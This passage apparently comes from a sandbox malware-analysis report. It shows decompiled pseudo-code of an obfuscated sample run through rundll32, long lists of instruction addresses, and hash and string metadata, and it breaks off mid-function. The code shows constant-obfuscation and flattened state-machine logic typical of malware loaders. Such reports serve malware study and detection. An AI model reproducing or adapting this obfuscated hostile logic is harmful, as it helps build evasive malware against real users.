				signed int _t514;
				void* _t515;
				signed int* _t518;
				void* _t521;

				_t518 =  &_v1760;
				_v1576 = 0xf21b90;
				_v1596 = _v1596 & 0x00000000;
				asm("stosd");
				_t505 = 0x2b;
				asm("stosd");
				_t461 = 0x34076d8;
				asm("stosd");
				_v1580 = 0xbaeef6;
				_v1580 = _v1580 + 0xba3c;
				_v1580 = _v1580 ^ 0x00bba91b;
				_v1660 = 0x2ae6d5;
				_v1660 = _v1660 << 6;
				_v1660 = _v1660 / _t505;
				_v1660 = _v1660 ^ 0x0030dab5;
				_v1716 = 0xb009df;
				_v1716 = _v1716 ^ 0xf6c25862;
				_v1716 = _v1716 + 0xcd46;
				_v1716 = _v1716 + 0x716d;
				_v1716 = _v1716 ^ 0xf6739072;
				_v1588 = 0x61188e;
				_v1588 = _v1588 ^ 0xbe54106a;
				_v1588 = _v1588 ^ 0xbe3508e6;
				_v1600 = 0x5c78c8;
				_v1600 = _v1600 | 0xa4208796;
				_v1600 = _v1600 ^ 0xa47cffde;
				_v1684 = 0xfd831d;
				_v1684 = _v1684 << 5;
				_v1684 = _v1684 >> 0xc;
				_v1684 = _v1684 ^ 0x0001fb16;
				_v1608 = 0x3a7886;
				_v1608 = _v1608 + 0xffff806f;
				_v1608 = _v1608 ^ 0x003b1c87;
				_v1616 = 0x5dea07;
				_t506 = 9;
				_v1616 = _v1616 * 0x59;
				_v1616 = _v1616 ^ 0x20ad8776;
				_v1708 = 0xdb05ba;
				_v1708 = _v1708 ^ 0x457fa961;
				_v1708 = _v1708 | 0x4dd1de05;
				_v1708 = _v1708 + 0xffff2bcd;
				_v1708 = _v1708 ^ 0x4dffde68;
				_v1740 = 0x5f9fa;
				_v1740 = _v1740 >> 0x10;
				_v1740 = _v1740 * 0x47;
				_v1740 = _v1740 / _t506;
				_v1740 = _v1740 ^ 0x0003f3c1;
				_v1700 = 0xeda1e9;
				_v1700 = _v1700 << 0xb;
				_t507 = 0x4c;
				_v1700 = _v1700 * 0x17;
				_v1700 = _v1700 ^ 0xcc50fc90;
				_v1688 = 0xc376bf;
				_v1688 = _v1688 + 0xffffce34;
				_v1688 = _v1688 << 0xf;
				_v1688 = _v1688 ^ 0xa27d2095;
				_v1736 = 0x77df39;
				_v1736 = _v1736 >> 4;
				_v1736 = _v1736 >> 7;
				_v1736 = _v1736 / _t507;
				_v1736 = _v1736 ^ 0x0006bba1;
				_v1744 = 0xdb3f7a;
				_v1744 = _v1744 << 0xc;
				_t508 = 0x46;
				_v1744 = _v1744 / _t508;
				_t509 = 0x2e;
				_v1744 = _v1744 / _t509;
				_v1744 = _v1744 ^ 0x0009adba;
				_v1620 = 0x28e24f;
				_v1620 = _v1620 << 1;
				_v1620 = _v1620 ^ 0x00586b21;
				_v1720 = 0xedf2ea;
				_v1720 = _v1720 >> 0xd;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0xd060;
				_v1720 = _v1720 ^ 0x00e1c656;
				_v1728 = 0x3692b9;
				_v1728 = _v1728 + 0xffff0cc0;
				_v1728 = _v1728 ^ 0x15726ff1;
				_v1728 = _v1728 << 7;
				_v1728 = _v1728 ^ 0xa3f1c3b7;
				_v1628 = 0xe9d0b6;
				_v1628 = _v1628 + 0xffff0b2c;
				_v1628 = _v1628 ^ 0x00e13fcd;
				_v1672 = 0xb5656;
				_v1672 = _v1672 << 1;
				_t510 = 0x75;
				_v1672 = _v1672 / _t510;
				_v1672 = _v1672 ^ 0x0000c760;
				_v1636 = 0xb446a;
				_t511 = 0x66;
				_v1636 = _v1636 * 0x2c;
				_v1636 = _v1636 ^ 0x01e018a2;
				_v1612 = 0x7754cf;
				_v1612 = _v1612 ^ 0x9195c63c;
				_v1612 = _v1612 ^ 0x91eaa7e8;
				_v1656 = 0x90fdf5;
				_v1656 = _v1656 | 0x8a72400d;
				_v1656 = _v1656 / _t511;
				_v1656 = _v1656 ^ 0x015bbc23;
				_v1664 = 0xea1595;
				_v1664 = _v1664 ^ 0x656fc689;
				_t512 = 0x1d;
				_v1664 = _v1664 / _t512;
				_v1664 = _v1664 ^ 0x0381a839;
				_v1724 = 0x1903df;
				_v1724 = _v1724 ^ 0xd471d85a;
				_v1724 = _v1724 << 9;
				_v1724 = _v1724 + 0xa250;
				_v1724 = _v1724 ^ 0xd1be858e;
				_v1592 = 0x634acd;
				_v1592 = _v1592 >> 1;
				_v1592 = _v1592 ^ 0x0031fc8c;
				_v1624 = 0x214267;
				_v1624 = _v1624 >> 0xe;
				_v1624 = _v1624 ^ 0x000cae4b;
				_v1748 = 0xf70b55;
				_v1748 = _v1748 ^ 0x8376c783;
				_v1748 = _v1748 + 0xffff9546;
				_v1748 = _v1748 ^ 0x30c8a062;
				_v1748 = _v1748 ^ 0xb347cf79;
				_v1644 = 0x4a974c;
				_v1644 = _v1644 + 0xf754;
				_v1644 = _v1644 ^ 0x0044301a;
				_v1756 = 0xfefcd0;
				_v1756 = _v1756 + 0xffff9941;
				_v1756 = _v1756 << 0xc;
				_v1756 = _v1756 + 0x3291;
				_v1756 = _v1756 ^ 0xe96b65aa;
				_v1632 = 0x34bd00;
				_v1632 = _v1632 << 0xd;
				_v1632 = _v1632 ^ 0x97a30bc0;
				_v1676 = 0xf19685;
				_t513 = 0x7b;
				_v1676 = _v1676 * 0x54;
				_v1676 = _v1676 ^ 0x1e84cba5;
				_v1676 = _v1676 ^ 0x51c47a4f;
				_v1652 = 0x3d5ed0;
				_v1652 = _v1652 * 7;
				_v1652 = _v1652 / _t513;
				_v1652 = _v1652 ^ 0x0004a817;
				_v1668 = 0x31208a;
				_v1668 = _v1668 << 3;
				_v1668 = _v1668 + 0x3afc;
				_v1668 = _v1668 ^ 0x0186e9ee;
				_v1692 = 0x9120a;
				_v1692 = _v1692 + 0xffff3905;
				_v1692 = _v1692 ^ 0x12b553f3;
				_v1692 = _v1692 ^ 0x12bb5ad6;
				_v1680 = 0x26d3f8;
				_v1680 = _v1680 << 7;
				_v1680 = _v1680 + 0xa827;
				_v1680 = _v1680 ^ 0x136c77e8;
				_v1584 = 0x751146;
				_v1584 = _v1584 << 7;
				_v1584 = _v1584 ^ 0x3a8d2dd0;
				_v1732 = 0x266ad0;
				_v1732 = _v1732 + 0xffffe92f;
				_v1732 = _v1732 | 0xe77a0674;
				_v1732 = _v1732 << 8;
				_v1732 = _v1732 ^ 0x7e56f20f;
				_v1640 = 0xc95fbf;
				_v1640 = _v1640 >> 1;
				_v1640 = _v1640 ^ 0x006563fc;
				_v1752 = 0xe51758;
				_v1752 = _v1752 + 0x7d69;
				_v1752 = _v1752 << 8;
				_v1752 = _v1752 >> 5;
				_v1752 = _v1752 ^ 0x0727d5ea;
				_v1696 = 0x906e7e;
				_t514 = 0x72;
				_v1696 = _v1696 / _t514;
				_v1696 = _v1696 << 0xd;
				_v1696 = _v1696 ^ 0x288be572;
				_v1760 = 0xae4c89;
				_v1760 = _v1760 >> 4;
				_v1760 = _v1760 * 0x14;
				_v1760 = _v1760 | 0x4c6e4d0e;
				_v1760 = _v1760 ^ 0x4cfa322f;
				_v1704 = 0x3b4ff5;
				_v1704 = _v1704 + 0xd6b6;
				_v1704 = _v1704 << 0x10;
				_v1704 = _v1704 << 0xe;
				_v1704 = _v1704 ^ 0xc00053ef;
				_v1604 = 0xa38704;
				_v1604 = _v1604 + 0xffffb37d;
				_v1604 = _v1604 ^ 0x00a5c604;
				_v1712 = 0x302894;
				_v1712 = _v1712 << 6;
				_v1712 = _v1712 + 0xffffae4b;
				_v1712 = _v1712 + 0xffff6004;
				_v1712 = _v1712 ^ 0x0c025a19;
				_t515 = 0x5a6577d;
				_t517 = _v1596;
				_t502 = _v1596;
				_t460 = _v1596;
				_v1648 = 0xc7a381;
				_v1648 = _v1648 ^ 0xa2d00ae3;
				_v1648 = _v1648 >> 0xa;
				_v1648 = _v1648 ^ 0x002465a0;
				while(1) {
					L1:
					_t492 = 0x5c;
					do {
						while(1) {
							L2:
							_t521 = _t461 - _t515;
							if(_t521 <= 0) {
								break;
							}
							__eflags = _t461 - 0x744da3a;
							if(__eflags == 0) {
								_push(_v1744);
								_push(_v1736);
								_push(0x2b10fc);
								_t442 = E002BAB66(_v1700, _v1688, __eflags);
								E002CC66E( &_v1560, __eflags);
								_t446 =  *0x2d520c; // 0x0
								_t448 =  *0x2d520c; // 0x0
								__eflags = _t448 + 0x220;
								E002CBDB5( &_v520, _t448 + 0x220, _v1620, _v1720, _v1728, _v1628, _t448 + 0x220, _v1672, _v1636, _t446 + 8,  &_v1560,  &_v1040, _t442);
								E002BAE03(_v1612, _v1656, _v1664, _t442);
								_t518 =  &(_t518[0x10]);
								_t461 = 0xe241e24;
								_t515 = 0x5a6577d;
								_t492 = 0x5c;
								goto L26;
							} else {
								__eflags = _t461 - 0xe241e24;
								if(_t461 == 0xe241e24) {
									_t503 =  *0x2d520c; // 0x0
									_t504 = _t503 + 0x220;
									while(1) {
										__eflags =  *_t504 - _t492;
										if( *_t504 == _t492) {
											break;
										}
										_t504 = _t504 + 2;
										__eflags = _t504;
									}
									_t502 = _t504 + 2;
									_t461 = 0x4f55465;
									continue;
								} else {
									__eflags = _t461 - 0xe6f489b;
									if(_t461 != 0xe6f489b) {
										goto L26;
									} else {
										E002CE689(_v1704, _v1604, _v1712, _t460, _v1648);
									}
								}
							}
							L20:
							return _v1596;
						}
						if(_t521 == 0) {
							E002CE689(_v1640, _v1752, _v1696, _t517, _v1760);
							_t518 =  &(_t518[3]);
							goto L15;
						} else {
							if(_t461 == 0x2fdd9cd) {
								E002CEE94(_t517, _t460, _v1584, _v1732);
								_t461 = _t515;
								goto L1;
							} else {
								if(_t461 == 0x34076d8) {
									_push(_t461);
									E002BEA7B( &_v1040, _v1608, _v1580, _t461, _v1616, _v1708, _v1740);
									_t518 =  &(_t518[7]);
									_t461 = 0x744da3a;
									while(1) {
										L1:
										_t492 = 0x5c;
										goto L2;
									}
								} else {
									if(_t461 == 0x4f55465) {
										_t460 = E002BEB36(_v1724, _v1592, _t461, _v1660);
										_t518 =  &(_t518[3]);
										__eflags = _t460;
										if(_t460 != 0) {
											_t461 = 0x5350d19;
											while(1) {
												L1:
												_t492 = 0x5c;
												goto L2;
											}
										}
									} else {
										if(_t461 != 0x5350d19) {
											goto L26;
										} else {
											_t458 = E002C0188(_t461, _v1624, _t460, _v1748, _t502, _v1644, _v1716, _t502, _v1756, _v1632, _v1676, _t461, _v1652, _v1684, _t461, _t461, _v1668, _v1600, _v1692, _t461,  &_v520, _v1588, _v1680);
											_t517 = _t458;
											_t518 =  &(_t518[0x15]);
											if(_t458 == 0) {
												L15:
												_t461 = 0xe6f489b;
												while(1) {
													L1:
													_t492 = 0x5c;
													goto L2;
												}
											} else {
												_t461 = 0x2fdd9cd;
												_v1596 = 1;
												while(1) {
													L1:
													_t492 = 0x5c;
													goto L2;
												}
											}
										}
									}
								}
							}
						}
						goto L20;
						L26:
						__eflags = _t461 - 0xbde599c;
					} while (_t461 != 0xbde599c);
					goto L20;
				}
			}













































































                                                                                                                      0x002c2bf6
                                                                                                                      0x002c2bfc
                                                                                                                      0x002c2c14
                                                                                                                      0x002c2c1c
                                                                                                                      0x002c2c21
                                                                                                                      0x002c2c24
                                                                                                                      0x002c2c25
                                                                                                                      0x002c2c2a
                                                                                                                      0x002c2c2b
                                                                                                                      0x002c2c36
                                                                                                                      0x002c2c41
                                                                                                                      0x002c2c4c
                                                                                                                      0x002c2c54
                                                                                                                      0x002c2c61
                                                                                                                      0x002c2c65
                                                                                                                      0x002c2c6d
                                                                                                                      0x002c2c75
                                                                                                                      0x002c2c7d
                                                                                                                      0x002c2c85
                                                                                                                      0x002c2c8d
                                                                                                                      0x002c2c95
                                                                                                                      0x002c2ca0
                                                                                                                      0x002c2cab
                                                                                                                      0x002c2cb6
                                                                                                                      0x002c2cc1
                                                                                                                      0x002c2ccc
                                                                                                                      0x002c2cd7
                                                                                                                      0x002c2cdf
                                                                                                                      0x002c2ce4
                                                                                                                      0x002c2ce9
                                                                                                                      0x002c2cf1
                                                                                                                      0x002c2cfc
                                                                                                                      0x002c2d07
                                                                                                                      0x002c2d12
                                                                                                                      0x002c2d25
                                                                                                                      0x002c2d28
                                                                                                                      0x002c2d2f
                                                                                                                      0x002c2d3a
                                                                                                                      0x002c2d42
                                                                                                                      0x002c2d4a
                                                                                                                      0x002c2d52
                                                                                                                      0x002c2d5a
                                                                                                                      0x002c2d62
                                                                                                                      0x002c2d6a
                                                                                                                      0x002c2d74
                                                                                                                      0x002c2d80
                                                                                                                      0x002c2d84
                                                                                                                      0x002c2d8c
                                                                                                                      0x002c2d94
                                                                                                                      0x002c2d9e
                                                                                                                      0x002c2d9f
                                                                                                                      0x002c2da3
                                                                                                                      0x002c2dab
                                                                                                                      0x002c2db3
                                                                                                                      0x002c2dbb
                                                                                                                      0x002c2dc0
                                                                                                                      0x002c2dc8
                                                                                                                      0x002c2dd0
                                                                                                                      0x002c2dd5
                                                                                                                      0x002c2de0
                                                                                                                      0x002c2de4
                                                                                                                      0x002c2dec
                                                                                                                      0x002c2df6
                                                                                                                      0x002c2e01
                                                                                                                      0x002c2e06
                                                                                                                      0x002c2e10
                                                                                                                      0x002c2e15
                                                                                                                      0x002c2e1b
                                                                                                                      0x002c2e23
                                                                                                                      0x002c2e2e
                                                                                                                      0x002c2e35
                                                                                                                      0x002c2e40
                                                                                                                      0x002c2e48
                                                                                                                      0x002c2e4d
                                                                                                                      0x002c2e52
                                                                                                                      0x002c2e5a
                                                                                                                      0x002c2e62
                                                                                                                      0x002c2e6a
                                                                                                                      0x002c2e72
                                                                                                                      0x002c2e7a
                                                                                                                      0x002c2e7f
                                                                                                                      0x002c2e87
                                                                                                                      0x002c2e92
                                                                                                                      0x002c2e9d
                                                                                                                      0x002c2ea8
                                                                                                                      0x002c2eb0
                                                                                                                      0x002c2eb8
                                                                                                                      0x002c2ebd
                                                                                                                      0x002c2ec3
                                                                                                                      0x002c2ecb
                                                                                                                      0x002c2ede
                                                                                                                      0x002c2ee1
                                                                                                                      0x002c2ee8
                                                                                                                      0x002c2ef3
                                                                                                                      0x002c2efe
                                                                                                                      0x002c2f09
                                                                                                                      0x002c2f14
                                                                                                                      0x002c2f1c
                                                                                                                      0x002c2f2c
                                                                                                                      0x002c2f30
                                                                                                                      0x002c2f38
                                                                                                                      0x002c2f40
                                                                                                                      0x002c2f4c
                                                                                                                      0x002c2f4f
                                                                                                                      0x002c2f53
                                                                                                                      0x002c2f5b
                                                                                                                      0x002c2f63
                                                                                                                      0x002c2f6b
                                                                                                                      0x002c2f70
                                                                                                                      0x002c2f78
                                                                                                                      0x002c2f80
                                                                                                                      0x002c2f8b
                                                                                                                      0x002c2f92
                                                                                                                      0x002c2f9d
                                                                                                                      0x002c2fa8
                                                                                                                      0x002c2fb0
                                                                                                                      0x002c2fbb
                                                                                                                      0x002c2fc3
                                                                                                                      0x002c2fcb
                                                                                                                      0x002c2fd3
                                                                                                                      0x002c2fdb
                                                                                                                      0x002c2fe3
                                                                                                                      0x002c2ff0
                                                                                                                      0x002c2ffb
                                                                                                                      0x002c3006
                                                                                                                      0x002c300e
                                                                                                                      0x002c3016
                                                                                                                      0x002c301b
                                                                                                                      0x002c3023
                                                                                                                      0x002c302b
                                                                                                                      0x002c3036
                                                                                                                      0x002c303e
                                                                                                                      0x002c3049
                                                                                                                      0x002c3058
                                                                                                                      0x002c305b
                                                                                                                      0x002c305f
                                                                                                                      0x002c3067
                                                                                                                      0x002c306f
                                                                                                                      0x002c3082
                                                                                                                      0x002c3094
                                                                                                                      0x002c309b
                                                                                                                      0x002c30a6
                                                                                                                      0x002c30ae
                                                                                                                      0x002c30b3
                                                                                                                      0x002c30bb
                                                                                                                      0x002c30c3
                                                                                                                      0x002c30cb
                                                                                                                      0x002c30d3
                                                                                                                      0x002c30db
                                                                                                                      0x002c30e3
                                                                                                                      0x002c30eb
                                                                                                                      0x002c30f0
                                                                                                                      0x002c30f8
                                                                                                                      0x002c3100
                                                                                                                      0x002c310b
                                                                                                                      0x002c3113
                                                                                                                      0x002c311e
                                                                                                                      0x002c3126
                                                                                                                      0x002c312e
                                                                                                                      0x002c3136
                                                                                                                      0x002c313b
                                                                                                                      0x002c3143
                                                                                                                      0x002c314e
                                                                                                                      0x002c3155
                                                                                                                      0x002c3160
                                                                                                                      0x002c3168
                                                                                                                      0x002c3170
                                                                                                                      0x002c3175
                                                                                                                      0x002c317a
                                                                                                                      0x002c3182
                                                                                                                      0x002c318e
                                                                                                                      0x002c3191
                                                                                                                      0x002c3195
                                                                                                                      0x002c319a
                                                                                                                      0x002c31a2
                                                                                                                      0x002c31aa
                                                                                                                      0x002c31b4
                                                                                                                      0x002c31b8
                                                                                                                      0x002c31c0
                                                                                                                      0x002c31c8
                                                                                                                      0x002c31d0
                                                                                                                      0x002c31d8
                                                                                                                      0x002c31dd
                                                                                                                      0x002c31e2
                                                                                                                      0x002c31ea
                                                                                                                      0x002c31f5
                                                                                                                      0x002c3200
                                                                                                                      0x002c320b
                                                                                                                      0x002c3213
                                                                                                                      0x002c3218
                                                                                                                      0x002c3220
                                                                                                                      0x002c3228
                                                                                                                      0x002c3230
                                                                                                                      0x002c3235
                                                                                                                      0x002c323c
                                                                                                                      0x002c3243
                                                                                                                      0x002c324a
                                                                                                                      0x002c3255
                                                                                                                      0x002c3260
                                                                                                                      0x002c3268
                                                                                                                      0x002c3273
                                                                                                                      0x002c3273
                                                                                                                      0x002c3275
                                                                                                                      0x002c3276
                                                                                                                      0x002c3276
                                                                                                                      0x002c3276
                                                                                                                      0x002c3276
                                                                                                                      0x002c3278
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c33e4
                                                                                                                      0x002c33ea
                                                                                                                      0x002c3454
                                                                                                                      0x002c3458
                                                                                                                      0x002c3464
                                                                                                                      0x002c3469
                                                                                                                      0x002c3477
                                                                                                                      0x002c3492
                                                                                                                      0x002c34b0
                                                                                                                      0x002c34b5
                                                                                                                      0x002c34d1
                                                                                                                      0x002c34ec
                                                                                                                      0x002c34f1
                                                                                                                      0x002c34f4
                                                                                                                      0x002c34f9
                                                                                                                      0x002c3500
                                                                                                                      0x00000000
                                                                                                                      0x002c33ec
                                                                                                                      0x002c33ec
                                                                                                                      0x002c33f2
                                                                                                                      0x002c3431
                                                                                                                      0x002c3437
                                                                                                                      0x002c3442
                                                                                                                      0x002c3442
                                                                                                                      0x002c3445
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x002c343f
                                                                                                                      0x002c343f
                                                                                                                      0x002c343f
                                                                                                                      0x002c3447
                                                                                                                      0x002c344a
                                                                                                                      0x00000000
                                                                                                                      0x002c33f4
                                                                                                                      0x002c33f4
                                                                                                                      0x002c33fa
                                                                                                                      0x00000000
                                                                                                                      0x002c3400
                                                                                                                      0x002c3417
                                                                                                                      0x002c341c
                                                                                                                      0x002c33fa
                                                                                                                      0x002c33f2
                                                                                                                      0x002c341f
                                                                                                                      0x002c3430
                                                                                                                      0x002c3430
                                                                                                                      0x002c327e
                                                                                                                      0x002c33d2
                                                                                                                      0x002c33d7
                                                                                                                      0x00000000
                                                                                                                      0x002c3284
                                                                                                                      0x002c328a
                                                                                                                      0x002c33b0
                                                                                                                      0x002c33b7
                                                                                                                      0x00000000
                                                                                                                      0x002c3290
                                                                                                                      0x002c3296
                                                                                                                      0x002c3369
                                                                                                                      0x002c338f
                                                                                                                      0x002c3394
                                                                                                                      0x002c3397
                                                                                                                      0x002c3273
                                                                                                                      0x002c3273
                                                                                                                      0x002c3275
                                                                                                                      0x00000000
                                                                                                                      0x002c3275
                                                                                                                      0x002c329c
                                                                                                                      0x002c32a2
                                                                                                                      0x002c3352
                                                                                                                      0x002c3354
                                                                                                                      0x002c3357
                                                                                                                      0x002c3359
                                                                                                                      0x002c335f
                                                                                                                      0x002c3273
                                                                                                                      0x002c3273
                                                                                                                      0x002c3275
                                                                                                                      0x00000000
                                                                                                                      0x002c3275
                                                                                                                      0x002c3273
                                                                                                                      0x002c32a8
                                                                                                                      0x002c32ae
                                                                                                                      0x00000000
                                                                                                                      0x002c32b4
                                                                                                                      0x002c3316
                                                                                                                      0x002c331b
                                                                                                                      0x002c331d
                                                                                                                      0x002c3322
                                                                                                                      0x002c33da
                                                                                                                      0x002c33da
                                                                                                                      0x002c3273
                                                                                                                      0x002c3273
                                                                                                                      0x002c3275
                                                                                                                      0x00000000
                                                                                                                      0x002c3275
                                                                                                                      0x002c3328
                                                                                                                      0x002c3328
                                                                                                                      0x002c332d
                                                                                                                      0x002c3273
                                                                                                                      0x002c3273
                                                                                                                      0x002c3275
                                                                                                                      0x00000000
                                                                                                                      0x002c3275
                                                                                                                      0x002c3273
                                                                                                                      0x002c3322
                                                                                                                      0x002c32ae
                                                                                                                      0x002c32a2
                                                                                                                      0x002c3296
                                                                                                                      0x002c328a
                                                                                                                      0x00000000
                                                                                                                      0x002c3501
                                                                                                                      0x002c3501
                                                                                                                      0x002c3501
                                                                                                                      0x00000000
                                                                                                                      0x002c350d

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002B0000, based on PE: true
                                                                                                                      • Associated: 0000000B.00000002.443281134.00000000002B0000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 0000000B.00000002.443300447.00000000002D5000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_11_2_2b0000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: !kX$gB!$i}$mq$S
                                                                                                                      • API String ID: 0-2280178044
                                                                                                                      • Opcode ID: f57ffdb3d82aac97340b132d05cebb02cd4d7b7b62a81bfcf7888fdaf733c8de
                                                                                                                      • Instruction ID: b88637d8cf41a6b58f5179a2108ecf05c283393175e6a051b57767921eea3e76
                                                                                                                      • Opcode Fuzzy Hash: f57ffdb3d82aac97340b132d05cebb02cd4d7b7b62a81bfcf7888fdaf733c8de
                                                                                                                      • Instruction Fuzzy Hash: 222223715193809FD774CF25C88AB8BBBE1FBC5758F108A1DE29A86260D7B18958CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 002CB391 Relevance: 6.5, Strings: 5, Instructions: 285COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 97%
                                                                                                                      			E002CB391() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				signed int _v676;
				signed int _v680;
				signed int _v684;
				signed int _v688;
				signed int _v692;
				signed int _v696;
				signed int _t301;
				intOrPtr _t304;
				void* _t307;
				void* _t308;
				intOrPtr _t309;
				intOrPtr _t311;
				void* _t315;
				void* _t316;
				char _t321;
				signed int _t345;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				void* _t352;

				_v688 = 0x901d1c;
				_v688 = _v688 >> 1;
				_t316 = 0x1066f98;
				_v688 = _v688 >> 0xb;
				_v688 = _v688 >> 4;
				_v688 = _v688 ^ 0x00000091;
				_v672 = 0xe40ad3;
				_v672 = _v672 + 0xffffd85d;
				_v672 = _v672 * 0x13;
				_t315 = 0;
				_v672 = _v672 + 0xffff2a54;
				_v672 = _v672 ^ 0x10e907e4;
				_v592 = 0x3017ed;
				_t345 = 7;
				_v592 = _v592 * 0x4e;
				_v592 = _v592 ^ 0x0ea74a35;
				_v660 = 0x55ed7f;
				_v660 = _v660 << 0xa;
				_v660 = _v660 ^ 0xe1a17f4c;
				_v660 = _v660 ^ 0xb614834c;
				_v608 = 0x9a742a;
				_v608 = _v608 / _t345;
				_v608 = _v608 ^ 0x00111f40;
				_v620 = 0xa60b0f;
				_v620 = _v620 | 0xf97ffff7;
				_v620 = _v620 ^ 0xf9fd807b;
				_v648 = 0xfa23dc;
				_v648 = _v648 + 0xc8b0;
				_v648 = _v648 ^ 0x1c787af5;
				_v648 = _v648 ^ 0x1c8a9b8c;
				_v644 = 0x871147;
				_v644 = _v644 ^ 0x5acff931;
				_t346 = 0x17;
				_v644 = _v644 / _t346;
				_v644 = _v644 ^ 0x03ea575c;
				_v676 = 0x868c3;
				_v676 = _v676 | 0x99683da5;
				_v676 = _v676 ^ 0x7cfc9963;
				_v676 = _v676 * 0x60;
				_v676 = _v676 ^ 0x17da9425;
				_v692 = 0x1af18a;
				_v692 = _v692 >> 5;
				_v692 = _v692 >> 9;
				_v692 = _v692 | 0x73f4147c;
				_v692 = _v692 ^ 0x73f59be7;
				_v588 = 0xc5bea0;
				_v588 = _v588 >> 1;
				_v588 = _v588 ^ 0x00674961;
				_v640 = 0x2d0675;
				_v640 = _v640 << 0x10;
				_v640 = _v640 * 0x13;
				_v640 = _v640 ^ 0x7aa9e3bb;
				_v684 = 0x479e10;
				_v684 = _v684 >> 4;
				_v684 = _v684 >> 4;
				_v684 = _v684 + 0xffff346b;
				_v684 = _v684 ^ 0xfffe4734;
				_v632 = 0xc30056;
				_v632 = _v632 * 0x5c;
				_v632 = _v632 * 0x6f;
				_v632 = _v632 ^ 0x62b5b133;
				_v652 = 0xa7e056;
				_v652 = _v652 + 0xffffad3c;
				_v652 = _v652 + 0x159e;
				_v652 = _v652 ^ 0x00a9a717;
				_v656 = 0x7de4be;
				_v656 = _v656 ^ 0xe25ca0e3;
				_v656 = _v656 + 0xfffff925;
				_v656 = _v656 ^ 0xe22d648b;
				_v624 = 0x8a5e75;
				_v624 = _v624 << 1;
				_v624 = _v624 ^ 0x6ebaa440;
				_v624 = _v624 ^ 0x6faa9c0f;
				_v612 = 0xc07e93;
				_v612 = _v612 >> 0xe;
				_v612 = _v612 ^ 0x000a477b;
				_v680 = 0x9e34fb;
				_v680 = _v680 ^ 0x08ee2ed2;
				_v680 = _v680 | 0xddc8b22d;
				_v680 = _v680 + 0xffff580d;
				_v680 = _v680 ^ 0xddf50a5e;
				_v580 = 0xd0aa6a;
				_t347 = 0x7f;
				_v580 = _v580 / _t347;
				_v580 = _v580 ^ 0x000dde97;
				_v576 = 0xcc5a;
				_v576 = _v576 + 0xffff83d9;
				_v576 = _v576 ^ 0x0009e5e2;
				_v600 = 0x582413;
				_v600 = _v600 << 9;
				_v600 = _v600 ^ 0xb0446c4a;
				_v628 = 0x333e17;
				_v628 = _v628 + 0x2781;
				_v628 = _v628 << 2;
				_v628 = _v628 ^ 0x00cb68d0;
				_v636 = 0xefc605;
				_v636 = _v636 + 0xf21d;
				_v636 = _v636 ^ 0xa2cf77f2;
				_v636 = _v636 ^ 0xa23a4adf;
				_v584 = 0xc861d6;
				_v584 = _v584 + 0xfffffbc1;
				_v584 = _v584 ^ 0x00c0ae4c;
				_v696 = 0x7445bb;
				_v696 = _v696 >> 4;
				_v696 = _v696 >> 4;
				_t348 = 0x3d;
				_v696 = _v696 / _t348;
				_v696 = _v696 ^ 0x0009867a;
				_v668 = 0xeed7a6;
				_v668 = _v668 + 0xffff818b;
				_v668 = _v668 + 0xffff94c8;
				_v668 = _v668 | 0xd4d5cc38;
				_v668 = _v668 ^ 0xd4f8ebbd;
				_v616 = 0xaa402c;
				_v616 = _v616 | 0x0a4de871;
				_v616 = _v616 ^ 0x0aee0038;
				_v596 = 0xe91624;
				_v596 = _v596 << 5;
				_v596 = _v596 ^ 0x1d2db722;
				_v664 = 0xe73f23;
				_v664 = _v664 + 0xffff972a;
				_v664 = _v664 | 0x942ef86c;
				_v664 = _v664 ^ 0xa565e6c8;
				_v664 = _v664 ^ 0x31893120;
				_v604 = 0xdd76c6;
				_t349 = 0x2b;
				_t344 = _v616;
				_v604 = _v604 / _t349;
				_v604 = _v604 ^ 0x0000a605;
				do {
					while(_t316 != 0xb706b9) {
						if(_t316 == 0x1066f98) {
							_t316 = 0x2a9290b;
							continue;
						} else {
							if(_t316 == 0x2a9290b) {
								E002CBBB2(_v608, _v620,  &_v572);
								_t316 = 0xb706b9;
								continue;
							} else {
								if(_t316 == 0x5ceff6a) {
									_t301 = E002CE938(0, _v672, _v680, _v580, _v592, _t316, _v576, _v600, _t316, _v628, _v688,  &_v524);
									_t344 = _t301;
									_t352 = _t352 + 0x28;
									__eflags = _t301 - 0xffffffff;
									if(__eflags != 0) {
										_t316 = 0xefecb64;
										continue;
									}
								} else {
									if(_t316 == 0xe98dd96) {
										E002C4DAD(_v616, _v596, _t344, _v664, _v604);
									} else {
										if(_t316 == 0xefecb64) {
											_t304 = _v568;
											_t321 = _v572;
											_v560 = _t304;
											_v552 = _t304;
											_v544 = _t304;
											_v536 = _t304;
											_v532 = _v660;
											_v564 = _t321;
											_v556 = _t321;
											_v548 = _t321;
											_v540 = _t321;
											_t307 = E002B5D65(_t321, _t344, _v636, _t321,  &_v564, _v584, _v696, _v668);
											_t352 = _t352 + 0x18;
											__eflags = _t307;
											_t315 =  !=  ? 1 : _t315;
											_t316 = 0xe98dd96;
											continue;
										} else {
